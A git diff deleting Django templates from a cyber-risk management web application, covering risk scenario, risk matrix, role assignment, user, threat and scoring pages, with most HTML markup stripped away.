    - {{ form.current_proba.errors }} - {{ form.current_proba }} -
    -
    -

    {% trans "Current impact" %}

    - {{ form.current_impact.errors }} - {{ form.current_impact }} -
    -
    -
    -
    -
    -

    {% trans "Associated measures" %}

    -
    -
    -
    -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/ri_list.html b/core/templates/core/ri_list.html deleted file mode 100644 index f88a8d6..0000000 --- a/core/templates/core/ri_list.html +++ /dev/null @@ -1,182 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} - -
    - {% with page_title=_('Risk scenarios') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'riskscenario-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_riskscenario%} - {% include 'snippets/add_button_modal.html' with form=risk_scenario_create_form header=_("Add risk scenario") model="riskscenario" content=_("New risk scenario") %} - {% endif %} - - -
    -
    - - - - - - - - - {% for scenario in scenarios %} - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Name" %}{% trans "Threat" %}{% trans "Project" %}{% trans "Actions" %}
    -
    - {{ scenario.get_treatment_display|lower}} - -
    -

    - {{ scenario.name|capfirst }} -

    -
    -
    -
    -

    - {% if scenario.threat %}{{ scenario.threat }}{% else %}--{% endif %} -

    -
    -

    - {{ scenario.parent_project }} -

    -
    -
    - - {% if scenario.id in object_ids_change %} - - - - - - {% endif %} - {% if scenario.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=scenario header=_("Delete risk scenario?") %} - {% endif%} - -
    -
    - -

    {% trans "No scenario found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ri_update.html b/core/templates/core/ri_update.html deleted file mode 100644 index 18eb879..0000000 --- a/core/templates/core/ri_update.html +++ /dev/null @@ -1,333 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block head %} -{% endblock %} -{% block content %} -{% with page_title=scenario %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - - -
    -
    {% csrf_token %} -

    {{ form.non_field_errors|striptags }} -

    -
    -
    -
    -
    -

    {% trans "Scope" %}

    -
    -
    -
    -

    {% trans "Project" %}:

    -

    {{ scenario.analysis.project }}

    -
    -
    -

    {% trans "Analysis" %}:

    -

    {{ form.analysis.errors|striptags }}

    -

    {{ form.analysis }}

    - {% if form.analysis.field.widget.attrs.disabled %} - - {% endif %} -
    -
    -

    {% trans "Auditor" %}:

    - {% if scenario.analysis.auditor.get_full_name %} -

    {{ scenario.analysis.auditor.get_full_name }}

    - {% else %} -

    {{ scenario.analysis.auditor }}

    - {% endif %} -
    -
    -

    {% trans "Version" %}:

    -

    {{ scenario.analysis.version }}

    -
    -
    -
    -
    -
    -

    {% trans "Status" %}

    -
    -
    -

    {% trans "Last update" %}:

    -

    {{ scenario.updated_at }}

    -
    -
    -

    {% trans "Treatment status" %}

    -

    {{ form.treatment.errors|striptags }}

    - {{ form.treatment }} -
    -
    -
    -
    -
    -
    -
    -
    -

    {% trans "Threat" %}

    -

    {{ form.threat.errors|striptags }}

    - {{ form.threat }} -
    -
    -

    {% trans "Name" %}

    -

    {{ form.name.errors|striptags }}

    - {{ form.name }} -
    -
    -

    {% trans "Description" %}

    -

    {{ form.description.errors|striptags }}

    - {{ form.description }} -

    {{ form.description.help_text }}

    -
    -
    -
    -
    -
    -
    - - {{ form.assets }} - {% for error in form.assets.errors %} -
  • {{ error|striptags }}
  • - {% endfor %} -
    -
    - {{ form.assets.help_text|safe }} -
    -
    -
    -
    -
    -
    -
    -

    {% trans "Current risk" %}

    -

    {% trans "Existing measures" %}

    -

    {{ form.existing_measures.errors|striptags }}

    - {{ form.existing_measures }} -

    {{ form.existing_measures.help_text|striptags|capfirst }}

    -
    -
    -
    -

    {% trans "Current Assessment" %}

    -
    -
    -

    {% trans "Current probability" %}

    -

    {{ form.current_proba.errors|striptags }}

    - {{ form.current_proba }} -
    -
    - -
    -
    -

    {% trans "Current impact" %}

    -

    {{ form.current_impact.errors|striptags }}

    - {{ form.current_impact }} -
    -
    - -
    -
    -

    {% trans "Current risk level" %}

    -
    - - {{ scenario.get_current_risk.name }} - -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -

    {% trans "Comments" %}

    - -
    -
    -

    {{ form.comments.errors|striptags }}

    - {{ form.comments }} -
    -
    -
    -
    -
    -
    -

    {% trans "Target Assessment" %}

    -
    -
    -

    {% trans "Residual probability" %}

    -

    {{ form.residual_proba.errors|striptags }}

    - {{ form.residual_proba }} -
    -
    - -
    -
    -

    {% trans "Residual impact" %}

    -

    {{ form.residual_impact.errors|striptags }}

    - {{ form.residual_impact }} -
    -
    - -
    -
    -

    {% trans "Residual risk level" %}

    -
    - - {{ scenario.get_residual_risk.name }} - -
    -
    -
    -
    -
    - -
    -
    -

    {% trans "Residual risk" %}

    -
    {% trans "Additional measures" %}
    -
    -
    -
    - {% include 'snippets/update_button_modal.html' with form=measures_select_form header=_("Select security measures") model="riskscenario" content=_("Select") %} - {% include 'snippets/add_button_modal.html' with form=measure_create_form header=_("Add security measure") model="securitymeasure" content=_("New") %} -
    -
    - {% include 'snippets/mtg_list_nested.html' %} -
    -
    -
    -
    -
    -
    -
    - - - -
    -
    -
    - -
    - - - - - - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/risk_acceptance_email.txt b/core/templates/core/risk_acceptance_email.txt deleted file mode 100644 index de532e9..0000000 --- a/core/templates/core/risk_acceptance_email.txt +++ /dev/null @@ -1,15 +0,0 @@ -{% load i18n static%} - -{% autoescape off %} -{% trans "Hello"%}, - -{% trans "You have a risk acceptance review pending. To accept or decline it, click on the link below" %}. - -{{root_url}}{% url 'riskacceptance-detail' pk=pk %} - -{% trans "If you don't want to use this link or if it is broken, please connect to" %} {{root_url}} {% trans "and go to risk acceptances" %}. - -{% trans "Sincerely" %}, -{% trans "Mira Team" %} - -{% endautoescape %} \ No newline at end of file diff --git a/core/templates/core/risk_acceptance_update.html b/core/templates/core/risk_acceptance_update.html deleted file mode 100644 index 0cc08fb..0000000 --- a/core/templates/core/risk_acceptance_update.html +++ /dev/null @@ -1,50 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block content %} -{% with page_title=acceptance %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} - {{ field.helptext }} -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/risk_matrix.html b/core/templates/core/risk_matrix.html deleted file mode 100644 index e0257b3..0000000 --- a/core/templates/core/risk_matrix.html +++ /dev/null @@ -1,19 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block head %} -{% endblock %} - -{% block content %} -
    -
    -
    {% trans "Default" %}
    - {% include 'snippets/risk_matrix.html' with matrix='default' data=ri_clusters.current %} -
    -
    -
    {% trans "Critical" %}
    - {% include 'snippets/risk_matrix.html' with matrix='critical' data=ri_clusters.current %} -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/risk_matrix_detailed.html b/core/templates/core/risk_matrix_detailed.html deleted file mode 100644 index 48e0924..0000000 --- a/core/templates/core/risk_matrix_detailed.html +++ /dev/null @@ -1,73 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n core_extras %} - -{% block content %} -{% with page_title=matrix.name %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -{% if not matrix.is_enabled %} -
    -
    - {% blocktrans %} - This risk matrix is disabled, therefore it cannot be used in any new analyses. - In order to enable it, you can edit it and change its status. - {% endblocktrans %} -
    -
    -{% endif %} - -
    -
    - {% if change_riskmatrix %} - - {% trans "Edit" %} - - {% endif %} -
    - {% include 'snippets/risk_matrix.html' %} -
    - {% blocktrans count analyses=matrix.analyses|length trimmed %} - Used in {{ analyses }} analysis - {% plural %} - Used in {{ analyses }} analyses - {% endblocktrans %} - {% blocktrans count projects=matrix.projects|length trimmed %} - across {{ projects }} project - {% plural %} - across {{ projects }} projects - {% endblocktrans %} -
    - {% for project in viewable_projects %} -
    - -
    - - {% for analysis in viewable_analyses %} - {% if analysis.project == project %} - - - - - {% endif %} - {% endfor %} -
    - - {{ analysis }} - - - - {% if analysis in changeable_analyses %} - - {% endif %} -
    -
    -
    - {% endfor %} -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/risk_matrix_list.html b/core/templates/core/risk_matrix_list.html deleted file mode 100644 index 7a7918f..0000000 --- a/core/templates/core/risk_matrix_list.html +++ /dev/null @@ -1,128 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} - -
    - {% with page_title=_('Matrices') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'riskmatrix-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_riskmatrix %} - - {% endif %} -
    - -
    - - - - - - - - - - {% for matrix in matrices %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Name" %}{% trans "Description" %}{% trans "Projects" %}{% trans "Matrix" %}{% trans "Actions" %}
    -
    - {% if not matrix.is_enabled %} - {% trans "disabled" %} - {% endif %} -
    -

    - {{ matrix.name }} -

    -
    -
    -
    -

    - {{ matrix.description|linebreaksbr }} -

    -
    -

    - {{ matrix.projects|length }} -

    -
    -
    - {% for row in matrix.render_grid_as_colors %} -
    - {% for item in row reversed %} -
    - -
    - {% endfor %} -
    - {% endfor %} -
    -
    - -
    - - {% if matrix.id in object_ids_change %} - - - - - - {% endif %} - - {% if matrix.id in object_ids_delete and not matrix.is_used %} - {% include 'snippets/delete_button_modal.html' with object=matrix model='riskmatrix' header=_("Delete matrix?") %} - {% endif %} - -
    -
    - -

    {% trans "No matrix found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/risk_matrix_update.html b/core/templates/core/risk_matrix_update.html deleted file mode 100644 index 336ac79..0000000 --- a/core/templates/core/risk_matrix_update.html +++ /dev/null @@ -1,56 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% load core_extras %} -{% with page_title=_('Edit matrix') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Matrix information" %}

    -
    - -

    {{ matrix.name }}

    -
    -
    - {% include 'snippets/risk_matrix.html' %} -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} - {% if field.field.widget|class == "CheckboxInput" %} - {% include 'snippets/form_field_row.html' %} - {% elif field.field.widget|class == "CheckboxSelectMultiple" %} - {% include 'snippets/form_checkbox_select_multiple.html' %} - {% else %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {% if field.field.widget|class == "ReadOnlyPasswordHashWidget" %} - {% if field.value == '' %} - {{ field }} - {% else %} - {% endif %} - {% else %} - {{ field }} - {% endif %} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endif %} - {% endfor %} -
    -
    - - - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/role_assignment.html b/core/templates/core/role_assignment.html deleted file mode 100644 index a48b66c..0000000 --- a/core/templates/core/role_assignment.html +++ /dev/null @@ -1,6 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block content %} -{% with page_title=_(Role assignment) %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} \ No newline at end of file diff --git a/core/templates/core/role_assignment_create.html b/core/templates/core/role_assignment_create.html deleted file mode 100644 index e1652e1..0000000 --- a/core/templates/core/role_assignment_create.html +++ /dev/null @@ -1,36 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('New role assignment') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Role assignment" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/role_assignment_update.html b/core/templates/core/role_assignment_update.html deleted file mode 100644 index 1ef5ff4..0000000 --- a/core/templates/core/role_assignment_update.html +++ /dev/null @@ -1,36 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=assignment %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Role assignment" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/role_list.html b/core/templates/core/role_list.html deleted file mode 100644 index 47ca693..0000000 --- a/core/templates/core/role_list.html +++ /dev/null @@ -1,195 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -
    - {% with page_title=_('Role assignment') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -

    {% trans "Available roles" %}

    -

    - {% blocktrans %} - A assignment provides access to predefined menus and features so that depending - on the assignment (Administrator, Domain manager, Analyst...), users - can have access to the resources they need. - {% endblocktrans %} -

    -
    - {% for role in roles %} -
    -

    {{ role }}

    - {% include 'snippets/link_modal.html' with header=role content=_("Learn more") topic=role.name %} -
    - {% endfor %} -
    -
    -
    -
    -

    {% trans "Role assignments" %}

    - -
    -
    -
    {% trans "Users" %}
    -
    {% trans "User groups" %}
    -
    -
    - - - - - - - - - - {% for assignment in assignments %} - {% if assignment.user %} - - - - - - - - {% endif %} - {% empty %} - - - - {% endfor %} - -
    {% trans "User" %}{% trans "Email address" %}{% trans "Role" %}{% trans "Domains" %}{% trans "Actions" %}
    - - -
    -
    -

    - {{ assignment.user.email }} -

    -
    -
    -
    - - -
    -
    - {% for domain in assignment.domains.all %} -
  • - - {{ domain.name }} - -
  • - {% endfor %} -
    -
    -
    -
    - - - - - - - {% include 'snippets/delete_button_modal.html' with object=assignment header=_("Delete role assignment?") model="usergroup" %} -
    -
    -
    - -

    {% trans "No assignment found." %}

    -
    -
    - - - - - - - - - {% for assignment in assignments %} - {% if assignment.user_group %} - - - - - - - {% endif %} - {% empty %} - - - - {% endfor %} - -
    {% trans "User group" %}{% trans "Role" %}{% trans "Domains" %}{% trans "Actions" %}
    - - - - -
    -
    - {% for domain in assignment.perimeter_folders.all %} -
  • - - {{ domain.name }} - -
  • - {% endfor %} -
    -
    -
    -
    - - - - - - - - - - - {% comment %} {% include 'snippets/delete_button_modal.html' with object=assignment header=_("Delete role assignment?") model="usergroup" %} {% endcomment %} -
    -
    -
    - -

    {% trans "No assignment found." %}

    -
    -
    - {% include 'snippets/paginator.html' %} -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/role_update.html b/core/templates/core/role_update.html deleted file mode 100644 index 02a3341..0000000 --- a/core/templates/core/role_update.html +++ /dev/null @@ -1,37 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('Edit user group') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Role information" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    - -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/scoring.html b/core/templates/core/scoring.html deleted file mode 100644 index c4db4a5..0000000 --- a/core/templates/core/scoring.html +++ /dev/null @@ -1,379 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static %} - -{% block content %} - -{% with page_title=_('Scoring assistant') %} - {% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    - -
    -
    -

    {% trans "Risk matrix" %}

    - -
    -
    -
    - -
    -
    -
    {% trans "How technically skilled is this group of threat agents?" %}
    - -
    {% trans "How motivated is this group of threat agents to find and exploit this vulnerability?" %}
    - -
    {% trans "What resources and opportunities are required for this group of threat agents to find and exploit this vulnerability?" %}
    - -
    {% trans "How large is this group of threat agents?" %}
    - -
    -
    -
    -
    {% trans "Threat agent factors" %}
    -
    --
    -
    -
    -
    - -
    -
    -
    {% trans "How easy is it for this group of threat agents to discover this vulnerability?" %}
    - -
    {% trans "How easy is it for this group of threat agents to actually exploit this vulnerability?" %}
    - -
    {% trans "How well known is this vulnerability to this group of threat agents?" %}
    - -
    {% trans "How likely is an exploit to be detected?" %}
    - -
    -
    -
    -
    {% trans "Vulnerability factors" %}
    -
    --
    -
    -
    -
    -
    - -
    - -
    -
    -
    {% trans "How much financial damage will result from an exploit?" %}
    - -
    {% trans "Would an exploit result in reputation damage that would harm the business?" %}
    - -
    {% trans "How much exposure does non-compliance introduce?" %}
    - -
    {% trans "How much personally identifiable information could be disclosed?" %}
    - -
    -
    -
    -
    {% trans "Business impact factors" %}
    -
    --
    -
    - - -
    -
    -
    -
    - -
    -
    -
    {% trans "How much data could be disclosed and how sensitive is it?" %}
    - -
    {% trans "How much data could be corrupted and how damaged is it?" %}
    - -
    {% trans "How much service could be lost and how vital is it?" %}
    - -
    {% trans "Are the threat agents' actions traceable to an individual?" %}
    - -
    -
    -
    -
    {% trans "Technical impact factors" %}
    -
    --
    -
    -
    -
    -
    -
    - -
    -
    {% trans "Assessment vector:" %}
    -
    - -
    -
    -
    {% trans "Probability" %}
    -
    - -- -
    -
    -
    - -
    -
    {% trans "Risk level" %}
    - - -

    --

    - -
    - -
    -
    -
    {% trans "Impact" %}
    -
    - -- - -
    -
    -
    - -
    -
    -
    - -
    - - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/search_results.html b/core/templates/core/search_results.html deleted file mode 100644 index 7f5378d..0000000 --- a/core/templates/core/search_results.html +++ /dev/null @@ -1,98 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block content %} - -
    - {% with page_title=_('Search results') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    - -
    - -
    - -
    - - {% comment %} {% endcomment %} -
    -
    -
    -
    -
    - -
    -
    -
    - {% blocktrans count counter=results.Analysis|length %} - Risk analysis - {% plural %} - Risk analyses - {% endblocktrans %} ({{ results.Analysis|length }}) -
    - {% if not results.Analysis %} -
    {% trans "No results matched your query. Try something more specific." %}
    - {% endif %} -
    -
      - {% for entry in results.Analysis %} -
    • {{entry}}
    • - {% endfor %} -
    -
    -
    - - - -
    -
    - {% blocktrans count counter=results.RiskScenario|length %} - Risk scenario - {% plural %} - Risk scenarios - {% endblocktrans %} ({{ results.RiskScenario|length }}) -
    - {% if not results.RiskScenario %} -
    {% trans "No results matched your query. Try something more specific." %}
    - {% endif %} -
    - -
    -
    - - - -
    -
    - {% blocktrans count counter=results.SecurityMeasure|length %} - Security measure - {% plural %} - Security measures - {% endblocktrans %} ({{ results.SecurityMeasure|length }}) -
    - {% if not results.SecurityMeasure %} -
    {% trans "No results matched your query. Try something more specific." %}
    - {% endif %} -
    -
      - {% for entry in results.SecurityMeasure %} -
    • {{entry}}
    • - {% endfor %} -
    -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/security_function_list.html b/core/templates/core/security_function_list.html deleted file mode 100644 index 3273476..0000000 --- a/core/templates/core/security_function_list.html +++ /dev/null @@ -1,156 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -{% with page_title=_('Security functions') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'securityfunction-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_securityfunction %} - {% include 'snippets/add_button_modal.html' with form=security_function_create_form header=_("Add security function") model="securityfunction" content=_("New security function") %} - {% endif %} -
    -
    - - - - - - - - {% for function in functions %} - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Name" %}{% trans "Provider" %}{% trans "Actions" %}
    -
    -
    -

    - {{ function.name|capfirst }} -

    -
    -
    -
    -

    - {% if function.provider %} {{ function.provider }} {% else %} -- {% endif %} -

    -
    -
    - - {% if function.id in object_ids_change %} - - - - - - {% endif %} - {% if function.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=function header=_("Delete security function?") model='securityfunction' %} - {% endif %} -
    -
    - -

    {% trans "No security function found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/security_function_update.html b/core/templates/core/security_function_update.html deleted file mode 100644 index a5c28e1..0000000 --- a/core/templates/core/security_function_update.html +++ /dev/null @@ -1,38 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=function %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/sidebar.html b/core/templates/core/sidebar.html deleted file mode 100644 index 00e2e6b..0000000 --- a/core/templates/core/sidebar.html +++ /dev/null @@ -1,413 +0,0 @@ - -{% load static i18n %} -{% load core_extras %} - - -{% comment %} - TODO: Find a better solution for button getting in front of modal backdrop. - Here, we have two buttons, one with a z-index so that it is placed in front of the sidebar, and one - with no z-index so that it does not get in front of the backdrop when a modal is opened. - A small issue is that by removing its z-index, the button gets behind the sidebar when a modal is opened. -{% endcomment %} - - - diff --git a/core/templates/core/threat_list.html b/core/templates/core/threat_list.html deleted file mode 100644 index 394d2e0..0000000 --- a/core/templates/core/threat_list.html +++ /dev/null @@ -1,159 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -{% with page_title=_('Threats') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} - -
    -
    -
    - - - - - -
    -
    - -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'threat-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_threat %} - {% include 'snippets/add_button_modal.html' with form=threat_create_form header=_("Add threat") model="threat" content=_("New threat") %} - {% endif %} -
    -
    - - - - - - - - {% for threat in threats %} - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Threat" %}{% trans "Provider" %}{% trans "Actions" %}
    -
    -
    -

    - {{ threat.name|capfirst }} -

    -
    -
    -
    -

    - {{ threat.provider }} -

    -
    -
    - - {% if threat.id in object_ids_change %} - - - - - - {% endif %} - {% if threat.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=threat header=_("Delete threat?") model='threat' %} - {% endif %} - -
    -
    - -

    {% trans "No threat found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/threat_update.html b/core/templates/core/threat_update.html deleted file mode 100644 index 215e3b8..0000000 --- a/core/templates/core/threat_update.html +++ /dev/null @@ -1,38 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=threat %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/treatment.html b/core/templates/core/treatment.html deleted file mode 100644 index 108a270..0000000 --- a/core/templates/core/treatment.html +++ /dev/null @@ -1,72 +0,0 @@ -{% load i18n %} - -{% block content %} -
    -
    - {% if agg_data.names %} - {% comment %}
    -
    -
    {% trans "Risk level overview" %}
    -
    - {% include 'snippets/dual_bar_stacked.html' with ch_context=context.agg_data %} -
    -
    -
    {% endcomment %} -
    -
    -
    {% trans "Treatment progress overview" %}
    -
    - {% include 'snippets/treatment_progress_dual_bar.html' %} -
    -
    -
    -
    -
    {% trans "Your pending measures" %}:
    -
    {% trans "ordered by ranking score" %}
    -
    - - - - - - - - - - {% for mtg in measures %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Domain" %}{% trans "Measure" %}{% trans "Ranking score" %}{% trans "Status" %}{% trans "ETA" %}{% trans "Actions" %}
    {{ mtg.folder }}{{ mtg.name }}{{ mtg.get_ranking_score }}{{ mtg.get_status_display }}{% if mtd.eta %} {{ mtg.eta|date }} {% else %} -- {% endif %} - {% if mtg.id in viewable_measures %} - - {% endif %} - {% if mtg.id in updatable_measures %} - - {% endif %} -
    - -

    {% trans "No pending measure." %}

    -
    -
    -
    {% trans "Ranking score is an adaptive metric that combines the information of effort and current risk level, and crosses it with the other data to assist you for the prioritization." %}
    - {% else %} -
    -
    {% trans "Projects summary is empty." %}
    -
    - {% endif %} -
    -
    -
    -
    -{% endblock %} diff --git a/core/templates/core/user_create.html b/core/templates/core/user_create.html deleted file mode 100644 index 1795a2f..0000000 --- a/core/templates/core/user_create.html +++ /dev/null @@ -1,48 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('New user') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "User information" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - {% if field.name == "administrator" %} - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} -
    - {{ field.help_text|safe }} -
    -
    - {% else %} - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    - {% endif %} -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/user_list.html b/core/templates/core/user_list.html deleted file mode 100644 index 5e98de6..0000000 --- a/core/templates/core/user_list.html +++ /dev/null @@ -1,186 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -
    - {% with page_title=_('Users') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -
    -
    -
    -
    - -
    - {{ filter.form.q }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'user-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - -
    -

    {{ users_number }} {% trans "out of" %} {{ users_number_limit }}

    -
    -
    -
    - - - - - - - - - - {% for user in users %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Email Address" %}{% trans "User Groups" %}{% trans "Full Name" %}{% trans "Created At" %}{% trans "Actions" %}
    -
    - {% if not user.is_active %} - {% trans "inactive" %} - {% endif %} - {% if user.is_superuser %} - {% trans "superuser" %} - {% endif %} -
    -

    - {{ user.email }} -

    -
    -
    -
    -
      - {% for group in user.user_groups.all %} -
    • - {{ group }} -
    • - {% endfor %} -
    -
    -

    - {{ user.get_full_name }} -

    -
    -

    - {{ user.date_joined|date }} -

    -
    -
    - - - - - - - - - {% include 'snippets/delete_button_modal.html' with object=user header=_("Delete user?") model='user' extra_text=_("WARNING: It is STRONGLY recommended to set this user as inactive instead of deleting it, as it might break foreign-key relationship with risk analyses.") %} -
    -
    -
    - -

    {% trans "No user found." %}

    -
    -
    - {% include 'snippets/paginator.html' %} -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/user_update.html b/core/templates/core/user_update.html deleted file mode 100644 index 1ae9bc1..0000000 --- a/core/templates/core/user_update.html +++ /dev/null @@ -1,51 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% load core_extras %} -{% with page_title=_('Edit user') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "User information" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} - {% if field.field.widget|class == "CheckboxInput" %} - {% include 'snippets/form_field_row.html' %} - {% elif field.field.widget|class == "CheckboxSelectMultiple" %} - {% include 'snippets/form_checkbox_select_multiple.html' %} - {% else %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

